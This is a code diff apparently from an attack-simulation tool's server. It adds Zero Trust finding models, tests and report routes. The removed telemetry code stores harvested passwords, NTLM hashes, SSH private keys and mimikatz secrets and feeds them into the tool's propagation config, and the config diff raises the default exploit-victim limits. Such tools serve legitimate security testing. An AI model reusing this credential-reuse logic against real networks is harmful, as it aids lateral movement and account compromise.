     api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')

@@ -1,5 +1,4 @@
 from monkey_island.cc.environment import Environment
-import monkey_island.cc.auth


 class TestingEnvironment(Environment):

@@ -7,11 +6,5 @@ class TestingEnvironment(Environment):
         super(TestingEnvironment, self).__init__()
         self.testing = True

-    # SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
-    NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062' \
-                    '8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557'
-
     def get_auth_users(self):
-        return [
-            monkey_island.cc.auth.User(1, self.NO_AUTH_CREDS, self.NO_AUTH_CREDS)
-        ]
+        return []

@@ -0,0 +1,32 @@
from common.data.zero_trust_consts import TEST_MALICIOUS_ACTIVITY_TIMELINE, STATUS_VERIFY
from monkey_island.cc.models.zero_trust.finding import Finding


class AggregateFinding(Finding):
    @staticmethod
    def create_or_add_to_existing(test, status, events):
        """
        Create a new finding or add the events to an existing one if it's the same (same meaning same status and same
        test).

        :raises: Assertion error if this is used when there's more than one finding which fits the query - this is not
        how this function should be used.
        """
        existing_findings = Finding.objects(test=test, status=status)
        assert (len(existing_findings) < 2), "More than one finding exists for {}:{}".format(test, status)

        if len(existing_findings) == 0:
            Finding.save_finding(test, status, events)
        else:
            # Now we know for sure this is the only one
            orig_finding = existing_findings[0]
            orig_finding.add_events(events)
            orig_finding.save()


def add_malicious_activity_to_timeline(events):
    AggregateFinding.create_or_add_to_existing(
        test=TEST_MALICIOUS_ACTIVITY_TIMELINE,
        status=STATUS_VERIFY,
        events=events
    )

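As an illustration of the aggregation behaviour described in the docstring, a minimal usage sketch; it assumes a connected Island MongoDB and uses placeholder event text:

from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK
from monkey_island.cc.models.zero_trust.aggregate_finding import add_malicious_activity_to_timeline
from monkey_island.cc.models.zero_trust.event import Event

event = Event.create_event(title="Demo", message="placeholder", event_type=EVENT_TYPE_MONKEY_NETWORK)
# The first call creates the timeline finding; repeated calls with the same test+status
# append events to that single finding instead of creating duplicates.
add_malicious_activity_to_timeline([event])
add_malicious_activity_to_timeline([event])
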
@@ -0,0 +1,36 @@
from datetime import datetime

from mongoengine import EmbeddedDocument, DateTimeField, StringField

from common.data.zero_trust_consts import EVENT_TYPES


class Event(EmbeddedDocument):
    """
    This model represents a single event within a Finding (it is an EmbeddedDocument within Finding). It is meant to
    hold a detail of the Finding.

    This class has 2 main sections:
        * The schema section defines the DB fields in the document. This is the data of the object.
        * The logic section defines complex questions we can ask about a single document which are asked multiple
          times, or complex actions we will perform - somewhat like an API.
    """
    # SCHEMA
    timestamp = DateTimeField(required=True)
    title = StringField(required=True)
    message = StringField()
    event_type = StringField(required=True, choices=EVENT_TYPES)

    # LOGIC
    @staticmethod
    def create_event(title, message, event_type, timestamp=datetime.now()):
        event = Event(
            timestamp=timestamp,
            title=title,
            message=message,
            event_type=event_type
        )

        event.validate(clean=True)

        return event

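A minimal sketch of building a valid event (titles and messages below are placeholders). Passing an explicit timestamp is the safer pattern, since the `datetime.now()` default above is evaluated once at import time:

from datetime import datetime

from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK
from monkey_island.cc.models.zero_trust.event import Event

event = Event.create_event(
    title="Demo network event",         # placeholder
    message="placeholder detail text",  # placeholder
    event_type=EVENT_TYPE_MONKEY_NETWORK,
    timestamp=datetime.now())           # explicit timestamp per event
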
@@ -0,0 +1,60 @@
# coding=utf-8
"""
Define a Document Schema for Zero Trust findings.
"""

from mongoengine import Document, StringField, EmbeddedDocumentListField

from common.data.zero_trust_consts import ORDERED_TEST_STATUSES, TESTS, TESTS_MAP, TEST_EXPLANATION_KEY, PILLARS_KEY
# Dummy import for mongoengine.
# noinspection PyUnresolvedReferences
from monkey_island.cc.models.zero_trust.event import Event


class Finding(Document):
    """
    This model represents a Zero-Trust finding: a result of a test the monkey/island might perform to see if a
    specific principle of zero trust is upheld or broken.

    Findings might have the following statuses:
        Failed ❌
            Meaning that we are sure that something is wrong (example: segmentation issue).
        Verify ⁉
            Meaning that we need the user to check something himself (example: 2FA logs, AV missing).
        Passed ✔
            Meaning that we are sure that something is correct (example: Monkey failed exploiting).

    This class has 2 main sections:
        * The schema section defines the DB fields in the document. This is the data of the object.
        * The logic section defines complex questions we can ask about a single document which are asked multiple
          times, or complex actions we will perform - somewhat like an API.
    """
    # SCHEMA
    test = StringField(required=True, choices=TESTS)
    status = StringField(required=True, choices=ORDERED_TEST_STATUSES)
    events = EmbeddedDocumentListField(document_type=Event)
    # http://docs.mongoengine.org/guide/defining-documents.html#document-inheritance
    meta = {'allow_inheritance': True}

    # LOGIC
    def get_test_explanation(self):
        return TESTS_MAP[self.test][TEST_EXPLANATION_KEY]

    def get_pillars(self):
        return TESTS_MAP[self.test][PILLARS_KEY]

    # Creation methods
    @staticmethod
    def save_finding(test, status, events):
        finding = Finding(
            test=test,
            status=status,
            events=events)

        finding.save()

        return finding

    def add_events(self, events):
        # type: (list) -> None
        self.events.extend(events)

@@ -0,0 +1,50 @@
from mongoengine import StringField

from common.data.zero_trust_consts import TEST_SEGMENTATION, STATUS_FAILED, STATUS_PASSED
from monkey_island.cc.models.zero_trust.finding import Finding


def need_to_overwrite_status(saved_status, new_status):
    return (saved_status == STATUS_PASSED) and (new_status == STATUS_FAILED)


class SegmentationFinding(Finding):
    first_subnet = StringField()
    second_subnet = StringField()

    @staticmethod
    def create_or_add_to_existing_finding(subnets, status, segmentation_event):
        """
        Creates a segmentation finding. If a segmentation finding with the relevant subnets already exists, adds the
        event to the existing finding, and the "worst" status is chosen (i.e. if the existing one is "Failed" it will
        remain so).

        :param subnets: the 2 subnets of this finding.
        :param status: STATUS_PASSED or STATUS_FAILED
        :param segmentation_event: The specific event
        """
        assert len(subnets) == 2

        # Sort them so A -> B and B -> A segmentation findings will be the same one.
        subnets.sort()

        existing_findings = SegmentationFinding.objects(first_subnet=subnets[0], second_subnet=subnets[1])

        if len(existing_findings) == 0:
            # No finding exists - create.
            new_finding = SegmentationFinding(
                first_subnet=subnets[0],
                second_subnet=subnets[1],
                test=TEST_SEGMENTATION,
                status=status,
                events=[segmentation_event]
            )
            new_finding.save()
        else:
            # A finding exists (should be one). Add the event to it.
            assert len(existing_findings) == 1
            existing_finding = existing_findings[0]
            existing_finding.events.append(segmentation_event)
            if need_to_overwrite_status(existing_finding.status, status):
                existing_finding.status = status
            existing_finding.save()

@@ -0,0 +1,53 @@
from common.data.zero_trust_consts import *
from monkey_island.cc.models.zero_trust.aggregate_finding import AggregateFinding
from monkey_island.cc.models.zero_trust.event import Event
from monkey_island.cc.models.zero_trust.finding import Finding
from monkey_island.cc.testing.IslandTestCase import IslandTestCase


class TestAggregateFinding(IslandTestCase):
    def test_create_or_add_to_existing(self):
        self.fail_if_not_testing_env()
        self.clean_finding_db()

        test = TEST_MALICIOUS_ACTIVITY_TIMELINE
        status = STATUS_VERIFY
        events = [Event.create_event("t", "t", EVENT_TYPE_MONKEY_NETWORK)]
        self.assertEquals(len(Finding.objects(test=test, status=status)), 0)

        AggregateFinding.create_or_add_to_existing(test, status, events)

        self.assertEquals(len(Finding.objects(test=test, status=status)), 1)
        self.assertEquals(len(Finding.objects(test=test, status=status)[0].events), 1)

        AggregateFinding.create_or_add_to_existing(test, status, events)

        self.assertEquals(len(Finding.objects(test=test, status=status)), 1)
        self.assertEquals(len(Finding.objects(test=test, status=status)[0].events), 2)

    def test_create_or_add_to_existing_2_tests_already_exist(self):
        self.fail_if_not_testing_env()
        self.clean_finding_db()

        test = TEST_MALICIOUS_ACTIVITY_TIMELINE
        status = STATUS_VERIFY
        event = Event.create_event("t", "t", EVENT_TYPE_MONKEY_NETWORK)
        events = [event]
        self.assertEquals(len(Finding.objects(test=test, status=status)), 0)

        Finding.save_finding(test, status, events)

        self.assertEquals(len(Finding.objects(test=test, status=status)), 1)
        self.assertEquals(len(Finding.objects(test=test, status=status)[0].events), 1)

        AggregateFinding.create_or_add_to_existing(test, status, events)

        self.assertEquals(len(Finding.objects(test=test, status=status)), 1)
        self.assertEquals(len(Finding.objects(test=test, status=status)[0].events), 2)

        Finding.save_finding(test, status, events)

        self.assertEquals(len(Finding.objects(test=test, status=status)), 2)

        with self.assertRaises(AssertionError):
            AggregateFinding.create_or_add_to_existing(test, status, events)

@@ -0,0 +1,32 @@
from mongoengine import ValidationError

from common.data.zero_trust_consts import EVENT_TYPE_MONKEY_NETWORK
from monkey_island.cc.models.zero_trust.event import Event
from monkey_island.cc.testing.IslandTestCase import IslandTestCase


class TestEvent(IslandTestCase):
    def test_create_event(self):
        self.fail_if_not_testing_env()
        self.clean_finding_db()

        with self.assertRaises(ValidationError):
            _ = Event.create_event(
                title=None,  # title is required
                message="bla bla",
                event_type=EVENT_TYPE_MONKEY_NETWORK
            )

        with self.assertRaises(ValidationError):
            _ = Event.create_event(
                title="skjs",
                message="bla bla",
                event_type="Unknown"  # Unknown event type
            )

        # Assert that nothing is raised.
        _ = Event.create_event(
            title="skjs",
            message="bla bla",
            event_type=EVENT_TYPE_MONKEY_NETWORK
        )

@@ -0,0 +1,38 @@
from mongoengine import ValidationError

from common.data.zero_trust_consts import *
from monkey_island.cc.models.zero_trust.finding import Finding
from monkey_island.cc.models.zero_trust.event import Event
from monkey_island.cc.testing.IslandTestCase import IslandTestCase


class TestFinding(IslandTestCase):
    """
    Make sure to set server environment to `testing` in server.json! Otherwise this will mess up your mongo instance
    and won't work.

    Also, the working directory needs to be the working directory from which you usually run the island so the
    server.json file is found and loaded.
    """
    def test_save_finding_validation(self):
        self.fail_if_not_testing_env()
        self.clean_finding_db()

        with self.assertRaises(ValidationError):
            _ = Finding.save_finding(test="bla bla", status=STATUS_FAILED, events=[])

        with self.assertRaises(ValidationError):
            _ = Finding.save_finding(test=TEST_SEGMENTATION, status="bla bla", events=[])

    def test_save_finding_sanity(self):
        self.fail_if_not_testing_env()
        self.clean_finding_db()

        self.assertEquals(len(Finding.objects(test=TEST_SEGMENTATION)), 0)

        event_example = Event.create_event(
            title="Event Title", message="event message", event_type=EVENT_TYPE_MONKEY_NETWORK)
        Finding.save_finding(test=TEST_SEGMENTATION, status=STATUS_FAILED, events=[event_example])

        self.assertEquals(len(Finding.objects(test=TEST_SEGMENTATION)), 1)
        self.assertEquals(len(Finding.objects(status=STATUS_FAILED)), 1)

@@ -0,0 +1,52 @@
from common.data.zero_trust_consts import STATUS_FAILED, EVENT_TYPE_MONKEY_NETWORK
from monkey_island.cc.models.zero_trust.event import Event
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
from monkey_island.cc.models.zero_trust.segmentation_finding import SegmentationFinding


class TestSegmentationFinding(IslandTestCase):
    def test_create_or_add_to_existing_finding(self):
        self.fail_if_not_testing_env()
        self.clean_finding_db()

        first_segment = "1.1.1.0/24"
        second_segment = "2.2.2.0-2.2.2.254"
        third_segment = "3.3.3.3"
        event = Event.create_event("bla", "bla", EVENT_TYPE_MONKEY_NETWORK)

        SegmentationFinding.create_or_add_to_existing_finding(
            subnets=[first_segment, second_segment],
            status=STATUS_FAILED,
            segmentation_event=event
        )

        self.assertEquals(len(SegmentationFinding.objects()), 1)
        self.assertEquals(len(SegmentationFinding.objects()[0].events), 1)

        SegmentationFinding.create_or_add_to_existing_finding(
            # !!! REVERSE ORDER - should be added to the same finding
            subnets=[second_segment, first_segment],
            status=STATUS_FAILED,
            segmentation_event=event
        )

        self.assertEquals(len(SegmentationFinding.objects()), 1)
        self.assertEquals(len(SegmentationFinding.objects()[0].events), 2)

        SegmentationFinding.create_or_add_to_existing_finding(
            # New subnet pair - should create a new finding
            subnets=[first_segment, third_segment],
            status=STATUS_FAILED,
            segmentation_event=event
        )

        self.assertEquals(len(SegmentationFinding.objects()), 2)

        SegmentationFinding.create_or_add_to_existing_finding(
            # New subnet pair - should create a new finding
            subnets=[second_segment, third_segment],
            status=STATUS_FAILED,
            segmentation_event=event
        )

        self.assertEquals(len(SegmentationFinding.objects()), 3)

@@ -1,13 +0,0 @@
import flask_restful

from monkey_island.cc.auth import jwt_required
from monkey_island.cc.services.report import ReportService

__author__ = "itay.mizeretz"


class Report(flask_restful.Resource):

    @jwt_required()
    def get(self):
        return ReportService.get_report()

@@ -0,0 +1,41 @@
import httplib

import flask_restful
from flask import jsonify

from monkey_island.cc.auth import jwt_required
from monkey_island.cc.services.reporting.report import ReportService
from monkey_island.cc.services.reporting.zero_trust_service import ZeroTrustService

ZERO_TRUST_REPORT_TYPE = "zero_trust"
SECURITY_REPORT_TYPE = "security"
REPORT_TYPES = [SECURITY_REPORT_TYPE, ZERO_TRUST_REPORT_TYPE]

REPORT_DATA_PILLARS = "pillars"
REPORT_DATA_FINDINGS = "findings"
REPORT_DATA_PRINCIPLES_STATUS = "principles"

__author__ = ["itay.mizeretz", "shay.nehmad"]


class Report(flask_restful.Resource):

    @jwt_required()
    def get(self, report_type=SECURITY_REPORT_TYPE, report_data=None):
        if report_type == SECURITY_REPORT_TYPE:
            return ReportService.get_report()
        elif report_type == ZERO_TRUST_REPORT_TYPE:
            if report_data == REPORT_DATA_PILLARS:
                return jsonify({
                    "statusesToPillars": ZeroTrustService.get_statuses_to_pillars(),
                    "pillarsToStatuses": ZeroTrustService.get_pillars_to_statuses(),
                    "grades": ZeroTrustService.get_pillars_grades()
                })
            elif report_data == REPORT_DATA_PRINCIPLES_STATUS:
                return jsonify(ZeroTrustService.get_principles_status())
            elif report_data == REPORT_DATA_FINDINGS:
                return jsonify(ZeroTrustService.get_all_findings())

        flask_restful.abort(httplib.NOT_FOUND)

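To show how the new routes are addressed, a hedged client-side sketch; the Island address, TLS settings and the JWT value are assumptions, not defined in this change:

import requests

ISLAND = "https://localhost:5000"                  # assumed Island address
HEADERS = {"Authorization": "JWT <access token>"}  # the endpoints are protected by @jwt_required

# The old /api/report behaviour now lives under the "security" report type:
security = requests.get(ISLAND + "/api/report/security", headers=HEADERS, verify=False)

# The Zero Trust report is fetched in parts: pillars, principles, findings.
findings = requests.get(ISLAND + "/api/report/zero_trust/findings", headers=HEADERS, verify=False)
pillars = requests.get(ISLAND + "/api/report/zero_trust/pillars", headers=HEADERS, verify=False)
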
@@ -7,7 +7,7 @@ from flask import request, make_response, jsonify
 from monkey_island.cc.auth import jwt_required
 from monkey_island.cc.database import mongo
 from monkey_island.cc.services.node import NodeService
-from monkey_island.cc.services.report import ReportService
+from monkey_island.cc.services.reporting.report import ReportService
 from monkey_island.cc.services.attack.attack_report import AttackReportService
 from monkey_island.cc.utils import local_ip_addresses
 from monkey_island.cc.services.database import Database

@@ -1,6 +1,5 @@
 import json
 import logging
-import copy
 from datetime import datetime

 import dateutil

@@ -9,12 +8,8 @@ from flask import request

 from monkey_island.cc.auth import jwt_required
 from monkey_island.cc.database import mongo
-from monkey_island.cc.services import mimikatz_utils
-from monkey_island.cc.services.config import ConfigService
-from monkey_island.cc.services.edge import EdgeService
 from monkey_island.cc.services.node import NodeService
-from monkey_island.cc.encryptor import encryptor
-from monkey_island.cc.services.wmi_handler import WMIHandler
+from monkey_island.cc.services.telemetry.processing.processing import process_telemetry
 from monkey_island.cc.models.monkey import Monkey

 __author__ = 'Barak'

@@ -54,16 +49,9 @@ class Telemetry(flask_restful.Resource):
         Monkey.get_single_monkey_by_guid(telemetry_json['monkey_guid']).renew_ttl()

         monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])
+        NodeService.update_monkey_modify_time(monkey["_id"])

-        try:
-            NodeService.update_monkey_modify_time(monkey["_id"])
-            telem_category = telemetry_json.get('telem_category')
-            if telem_category in TELEM_PROCESS_DICT:
-                TELEM_PROCESS_DICT[telem_category](telemetry_json)
-            else:
-                logger.info('Got unknown type of telemetry: %s' % telem_category)
-        except Exception as ex:
-            logger.error("Exception caught while processing telemetry. Info: {}".format(ex.message), exc_info=True)
+        process_telemetry(telemetry_json)

         telem_id = mongo.db.telemetry.insert(telemetry_json)
         return mongo.db.telemetry.find_one_or_404({"_id": telem_id})

@@ -90,200 +78,3 @@ class Telemetry(flask_restful.Resource):
                     x['data']['credentials'][new_user] = x['data']['credentials'].pop(user)

         return objects

-    @staticmethod
-    def get_edge_by_scan_or_exploit_telemetry(telemetry_json):
-        dst_ip = telemetry_json['data']['machine']['ip_addr']
-        dst_domain_name = telemetry_json['data']['machine']['domain_name']
-        src_monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])
-        dst_node = NodeService.get_monkey_by_ip(dst_ip)
-        if dst_node is None:
-            dst_node = NodeService.get_or_create_node(dst_ip, dst_domain_name)
-
-        return EdgeService.get_or_create_edge(src_monkey["_id"], dst_node["_id"])
-
-    @staticmethod
-    def process_tunnel_telemetry(telemetry_json):
-        monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])["_id"]
-        if telemetry_json['data']['proxy'] is not None:
-            tunnel_host_ip = telemetry_json['data']['proxy'].split(":")[-2].replace("//", "")
-            NodeService.set_monkey_tunnel(monkey_id, tunnel_host_ip)
-        else:
-            NodeService.unset_all_monkey_tunnels(monkey_id)
-
-    @staticmethod
-    def process_state_telemetry(telemetry_json):
-        monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])
-        NodeService.add_communication_info(monkey, telemetry_json['command_control_channel'])
-        if telemetry_json['data']['done']:
-            NodeService.set_monkey_dead(monkey, True)
-        else:
-            NodeService.set_monkey_dead(monkey, False)
-
-    @staticmethod
-    def process_exploit_telemetry(telemetry_json):
-        edge = Telemetry.get_edge_by_scan_or_exploit_telemetry(telemetry_json)
-        Telemetry.encrypt_exploit_creds(telemetry_json)
-        telemetry_json['data']['info']['started'] = dateutil.parser.parse(telemetry_json['data']['info']['started'])
-        telemetry_json['data']['info']['finished'] = dateutil.parser.parse(telemetry_json['data']['info']['finished'])
-
-        new_exploit = copy.deepcopy(telemetry_json['data'])
-
-        new_exploit.pop('machine')
-        new_exploit['timestamp'] = telemetry_json['timestamp']
-
-        mongo.db.edge.update(
-            {'_id': edge['_id']},
-            {'$push': {'exploits': new_exploit}}
-        )
-        if new_exploit['result']:
-            EdgeService.set_edge_exploited(edge)
-
-        for attempt in telemetry_json['data']['attempts']:
-            if attempt['result']:
-                found_creds = {'user': attempt['user']}
-                for field in ['password', 'lm_hash', 'ntlm_hash', 'ssh_key']:
-                    if len(attempt[field]) != 0:
-                        found_creds[field] = attempt[field]
-                NodeService.add_credentials_to_node(edge['to'], found_creds)
-
-    @staticmethod
-    def process_scan_telemetry(telemetry_json):
-        edge = Telemetry.get_edge_by_scan_or_exploit_telemetry(telemetry_json)
-        data = copy.deepcopy(telemetry_json['data']['machine'])
-        ip_address = data.pop("ip_addr")
-        domain_name = data.pop("domain_name")
-        new_scan = \
-            {
-                "timestamp": telemetry_json["timestamp"],
-                "data": data
-            }
-        mongo.db.edge.update(
-            {"_id": edge["_id"]},
-            {"$push": {"scans": new_scan},
-             "$set": {"ip_address": ip_address, 'domain_name': domain_name}}
-        )
-
-        node = mongo.db.node.find_one({"_id": edge["to"]})
-        if node is not None:
-            scan_os = new_scan["data"]["os"]
-            if "type" in scan_os:
-                mongo.db.node.update({"_id": node["_id"]},
-                                     {"$set": {"os.type": scan_os["type"]}},
-                                     upsert=False)
-            if "version" in scan_os:
-                mongo.db.node.update({"_id": node["_id"]},
-                                     {"$set": {"os.version": scan_os["version"]}},
-                                     upsert=False)
-
-    @staticmethod
-    def process_system_info_telemetry(telemetry_json):
-        users_secrets = {}
-        monkey_id = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid']).get('_id')
-        if 'ssh_info' in telemetry_json['data']:
-            ssh_info = telemetry_json['data']['ssh_info']
-            Telemetry.encrypt_system_info_ssh_keys(ssh_info)
-            if telemetry_json['data']['network_info']['networks']:
-                # We use user_name@machine_ip as the name of the ssh key stolen, thats why we need ip from telemetry
-                Telemetry.add_ip_to_ssh_keys(telemetry_json['data']['network_info']['networks'][0], ssh_info)
-            Telemetry.add_system_info_ssh_keys_to_config(ssh_info)
-        if 'credentials' in telemetry_json['data']:
-            creds = telemetry_json['data']['credentials']
-            Telemetry.encrypt_system_info_creds(creds)
-            Telemetry.add_system_info_creds_to_config(creds)
-            Telemetry.replace_user_dot_with_comma(creds)
-        if 'mimikatz' in telemetry_json['data']:
-            users_secrets = mimikatz_utils.MimikatzSecrets. \
-                extract_secrets_from_mimikatz(telemetry_json['data'].get('mimikatz', ''))
-        if 'wmi' in telemetry_json['data']:
-            wmi_handler = WMIHandler(monkey_id, telemetry_json['data']['wmi'], users_secrets)
-            wmi_handler.process_and_handle_wmi_info()
-        if 'aws' in telemetry_json['data']:
-            if 'instance_id' in telemetry_json['data']['aws']:
-                mongo.db.monkey.update_one({'_id': monkey_id},
-                                           {'$set': {'aws_instance_id': telemetry_json['data']['aws']['instance_id']}})
-
-    @staticmethod
-    def add_ip_to_ssh_keys(ip, ssh_info):
-        for key in ssh_info:
-            key['ip'] = ip['addr']
-
-    @staticmethod
-    def process_trace_telemetry(telemetry_json):
-        # Nothing to do
-        return
-
-    @staticmethod
-    def replace_user_dot_with_comma(creds):
-        for user in creds:
-            if -1 != user.find('.'):
-                new_user = user.replace('.', ',')
-                creds[new_user] = creds.pop(user)
-
-    @staticmethod
-    def encrypt_system_info_creds(creds):
-        for user in creds:
-            for field in ['password', 'lm_hash', 'ntlm_hash']:
-                if field in creds[user]:
-                    # this encoding is because we might run into passwords which are not pure ASCII
-                    creds[user][field] = encryptor.enc(creds[user][field].encode('utf-8'))
-
-    @staticmethod
-    def encrypt_system_info_ssh_keys(ssh_info):
-        for idx, user in enumerate(ssh_info):
-            for field in ['public_key', 'private_key', 'known_hosts']:
-                if ssh_info[idx][field]:
-                    ssh_info[idx][field] = encryptor.enc(ssh_info[idx][field].encode('utf-8'))
-
-    @staticmethod
-    def add_system_info_creds_to_config(creds):
-        for user in creds:
-            ConfigService.creds_add_username(user)
-            if 'password' in creds[user]:
-                ConfigService.creds_add_password(creds[user]['password'])
-            if 'lm_hash' in creds[user]:
-                ConfigService.creds_add_lm_hash(creds[user]['lm_hash'])
-            if 'ntlm_hash' in creds[user]:
-                ConfigService.creds_add_ntlm_hash(creds[user]['ntlm_hash'])
-
-    @staticmethod
-    def add_system_info_ssh_keys_to_config(ssh_info):
-        for user in ssh_info:
-            ConfigService.creds_add_username(user['name'])
-            # Public key is useless without private key
-            if user['public_key'] and user['private_key']:
-                ConfigService.ssh_add_keys(user['public_key'], user['private_key'],
-                                           user['name'], user['ip'])
-
-    @staticmethod
-    def encrypt_exploit_creds(telemetry_json):
-        attempts = telemetry_json['data']['attempts']
-        for i in range(len(attempts)):
-            for field in ['password', 'lm_hash', 'ntlm_hash']:
-                credential = attempts[i][field]
-                if len(credential) > 0:
-                    attempts[i][field] = encryptor.enc(credential.encode('utf-8'))
-
-    @staticmethod
-    def process_post_breach_telemetry(telemetry_json):
-        mongo.db.monkey.update(
-            {'guid': telemetry_json['monkey_guid']},
-            {'$push': {'pba_results': telemetry_json['data']}})
-
-    @staticmethod
-    def process_attack_telemetry(telemetry_json):
-        # No processing required
-        pass
-
-
-TELEM_PROCESS_DICT = \
-    {
-        'tunnel': Telemetry.process_tunnel_telemetry,
-        'state': Telemetry.process_state_telemetry,
-        'exploit': Telemetry.process_exploit_telemetry,
-        'scan': Telemetry.process_scan_telemetry,
-        'system_info': Telemetry.process_system_info_telemetry,
-        'trace': Telemetry.process_trace_telemetry,
-        'post_breach': Telemetry.process_post_breach_telemetry,
-        'attack': Telemetry.process_attack_telemetry
-    }

@@ -111,6 +111,14 @@ SCHEMA = {
                     "title": "Back door user",
                     "attack_techniques": []
                 },
+                {
+                    "type": "string",
+                    "enum": [
+                        "CommunicateAsNewUser"
+                    ],
+                    "title": "Communicate as new user",
+                    "attack_techniques": []
+                },
             ],
         },
         "finger_classes": {

@@ -329,6 +337,7 @@ SCHEMA = {
                 "$ref": "#/definitions/post_breach_acts"
             },
             "default": [
+                "CommunicateAsNewUser"
             ],
             "description": "List of actions the Monkey will run post breach"
         },

@@ -439,13 +448,13 @@ SCHEMA = {
         "victims_max_find": {
             "title": "Max victims to find",
             "type": "integer",
-            "default": 30,
+            "default": 100,
             "description": "Determines the maximum number of machines the monkey is allowed to scan"
         },
         "victims_max_exploit": {
             "title": "Max victims to exploit",
             "type": "integer",
-            "default": 7,
+            "default": 15,
             "description":
                 "Determines the maximum number of machines the monkey"
                 " is allowed to successfully exploit. " + WARNING_SIGN

@@ -0,0 +1,5 @@
from monkey_island.cc.services.config import ConfigService


def get_config_network_segments_as_subnet_groups():
    return [ConfigService.get_config_value(['basic_network', 'network_analysis', 'inaccessible_subnets'])]

@@ -9,14 +9,16 @@ from enum import Enum

from six import text_type

from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst
from monkey_island.cc.database import mongo
from monkey_island.cc.models import Monkey
from monkey_island.cc.services.reporting.report_exporter_manager import ReportExporterManager
from monkey_island.cc.services.config import ConfigService
from monkey_island.cc.services.configuration.utils import get_config_network_segments_as_subnet_groups
from monkey_island.cc.services.edge import EdgeService
from monkey_island.cc.services.node import NodeService
from monkey_island.cc.utils import local_ip_addresses, get_subnets
from monkey_island.cc.services.pth_report import PTHReportService
from monkey_island.cc.services.reporting.pth_report import PTHReportService
from common.network.network_range import NetworkRange

__author__ = "itay.mizeretz"
@@ -415,23 +417,6 @@ class ReportService:
        return issues

    @staticmethod
    def get_ip_in_src_and_not_in_dst(ip_addresses, source_subnet, target_subnet):
        """
        Finds an IP address in ip_addresses which is in source_subnet but not in target_subnet.
        :param ip_addresses: List of IP addresses to test.
        :param source_subnet: Subnet to want an IP to not be in.
        :param target_subnet: Subnet we want an IP to be in.
        :return:
        """
        for ip_address in ip_addresses:
            if target_subnet.is_in_range(ip_address):
                return None
        for ip_address in ip_addresses:
            if source_subnet.is_in_range(ip_address):
                return ip_address
        return None

    @staticmethod
    def get_cross_segment_issues_of_single_machine(source_subnet_range, target_subnet_range):
        """
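Not part of the diff: the method removed above is not dropped, the same logic now lives in common.network.segmentation_utils (see the import added earlier in this diff). A standalone sketch of the selection rule, using plain sets of IP strings instead of the real NetworkRange objects:

def ip_in_src_and_not_in_dst(ip_addresses, source_ips, target_ips):
    # Reject the machine outright if any of its IPs is already inside the target segment.
    if any(ip in target_ips for ip in ip_addresses):
        return None
    # Otherwise return the first IP that belongs to the source segment.
    for ip in ip_addresses:
        if ip in source_ips:
            return ip
    return None

print(ip_in_src_and_not_in_dst(["10.0.0.5"], {"10.0.0.5"}, {"11.0.0.9"}))  # 10.0.0.5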
@@ -494,9 +479,9 @@ class ReportService:
            target_ip = scan['data']['machine']['ip_addr']
            if target_subnet_range.is_in_range(text_type(target_ip)):
                monkey = NodeService.get_monkey_by_guid(scan['monkey_guid'])
                cross_segment_ip = ReportService.get_ip_in_src_and_not_in_dst(monkey['ip_addresses'],
                cross_segment_ip = get_ip_in_src_and_not_in_dst(monkey['ip_addresses'],
                                                                source_subnet_range,
                                                                target_subnet_range)

                if cross_segment_ip is not None:
                    cross_segment_issues.append(
@@ -544,7 +529,7 @@ class ReportService:
        cross_segment_issues = []

        # For now the feature is limited to 1 group.
        subnet_groups = [ConfigService.get_config_value(['basic_network', 'network_analysis', 'inaccessible_subnets'])]
        subnet_groups = get_config_network_segments_as_subnet_groups()

        for subnet_group in subnet_groups:
            cross_segment_issues += ReportService.get_cross_segment_issues_per_subnet_group(scans, subnet_group)
@@ -1,7 +1,7 @@
import uuid

from monkey_island.cc.models import Monkey
from monkey_island.cc.services.pth_report import PTHReportService
from monkey_island.cc.services.reporting.pth_report import PTHReportService
from monkey_island.cc.testing.IslandTestCase import IslandTestCase

@ -0,0 +1,285 @@
|
||||||
|
from monkey_island.cc.services.reporting.zero_trust_service import ZeroTrustService
|
||||||
|
|
||||||
|
from common.data.zero_trust_consts import *
|
||||||
|
from monkey_island.cc.models.zero_trust.finding import Finding
|
||||||
|
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
|
||||||
|
|
||||||
|
|
||||||
|
def save_example_findings():
|
||||||
|
# arrange
|
||||||
|
Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 1
|
||||||
|
Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_PASSED, []) # devices passed = 2
|
||||||
|
Finding.save_finding(TEST_ENDPOINT_SECURITY_EXISTS, STATUS_FAILED, []) # devices failed = 1
|
||||||
|
# devices unexecuted = 1
|
||||||
|
# people verify = 1
|
||||||
|
# networks verify = 1
|
||||||
|
Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, [])
|
||||||
|
# people verify = 2
|
||||||
|
# networks verify = 2
|
||||||
|
Finding.save_finding(TEST_SCHEDULED_EXECUTION, STATUS_VERIFY, [])
|
||||||
|
# data failed 1
|
||||||
|
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
|
||||||
|
# data failed 2
|
||||||
|
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
|
||||||
|
# data failed 3
|
||||||
|
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
|
||||||
|
# data failed 4
|
||||||
|
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
|
||||||
|
# data failed 5
|
||||||
|
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_FAILED, [])
|
||||||
|
# data verify 1
|
||||||
|
Finding.save_finding(TEST_DATA_ENDPOINT_HTTP, STATUS_VERIFY, [])
|
||||||
|
# data verify 2
